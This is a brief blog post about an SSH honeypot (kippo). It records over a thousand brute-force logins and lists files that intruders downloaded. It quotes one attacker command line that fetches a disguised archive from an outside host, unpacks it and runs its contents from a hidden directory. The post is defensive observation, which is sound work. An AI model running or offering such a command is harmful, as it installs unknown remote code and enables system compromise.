successful ssh brute-force found by kippo

The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:

-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..

Tags:

Leave a Reply

You must be logged in to post a comment.